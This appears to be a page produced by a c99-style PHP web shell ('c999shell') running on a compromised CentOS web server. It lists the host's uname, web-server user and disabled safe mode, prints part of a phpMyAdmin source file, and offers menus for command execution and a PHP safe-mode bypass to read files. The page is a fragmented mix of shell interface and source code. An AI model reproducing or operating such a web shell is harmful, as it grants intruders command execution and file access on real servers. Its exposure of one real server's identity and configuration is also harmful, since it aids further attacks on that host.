Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/libraries/ drwxr-xr-x |
Viewing file: Select action/file-type: $sval) { if ($sql_query == '') { $sql_query .= 'SELECT ' . PMA_backquote(urldecode($sval)); } else { $sql_query .= ', ' . PMA_backquote(urldecode($sval)); } } $sql_query .= ' FROM ' . PMA_backquote(htmlspecialchars($table)); require('./sql.php'); break; } } else { $what = 'row_delete'; $selected = $rows_to_delete; } } // end if /** * Displays the confirmation form if required */ if ( !empty($submit_mult) && !empty($what)) { $js_to_run = 'functions.js'; unset($message); if (isset($table) && strlen($table)) { require('./libraries/tbl_properties_common.php'); $url_query .= '&goto=tbl_properties.php&back=tbl_properties.php'; require('./libraries/tbl_properties_table_info.inc.php'); } elseif (isset($db) && strlen($db)) { require('./libraries/db_details_common.inc.php'); require('./libraries/db_details_db_info.inc.php'); } // Builds the query $full_query = ''; if ($what == 'drop_tbl') { $full_query_views = ''; } $selected_cnt = count($selected); $i = 0; foreach ($selected AS $idx => $sval) { switch ($what) { case 'row_delete': $full_query .= htmlspecialchars(urldecode($sval)) . '; '; break; case 'drop_db': $full_query .= 'DROP DATABASE ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . '; '; $reload = 1; break; case 'drop_tbl': $current = urldecode($sval); if (!empty($views) && in_array($current, $views)) { $full_query_views .= (empty($full_query_views) ? 'DROP VIEW ' : ', ') . PMA_backquote(htmlspecialchars($current)); } else { $full_query .= (empty($full_query) ? 'DROP TABLE ' : ', ') . PMA_backquote(htmlspecialchars($current)); } break; case 'empty_tbl': if (PMA_MYSQL_INT_VERSION >= 40000) { $full_query .= 'TRUNCATE '; } else { $full_query .= 'DELETE FROM '; } $full_query .= PMA_backquote(htmlspecialchars(urldecode($sval))) . '; '; break; case 'primary_fld': if ($full_query == '') { $full_query .= 'ALTER TABLE ' . PMA_backquote(htmlspecialchars($table)) . ' DROP PRIMARY KEY,' . ' ADD PRIMARY KEY(' . ' ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } else { $full_query .= ' ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } if ($i == $selected_cnt-1) { $full_query = preg_replace('@,$@', '); ', $full_query); } break; case 'drop_fld': if ($full_query == '') { $full_query .= 'ALTER TABLE ' . PMA_backquote(htmlspecialchars($table)) . ' DROP ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } else { $full_query .= ' DROP ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } if ($i == $selected_cnt-1) { $full_query = preg_replace('@,$@', '; ', $full_query); } break; } // end switch $i++; } if ($what == 'drop_tbl') { if (!empty($full_query)) { $full_query .= '; ' . "\n"; } if (!empty($full_query_views)) { $full_query .= $full_query_views . '; ' . "\n"; } unset($full_query_views); } // Displays the form ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0049 ]-- |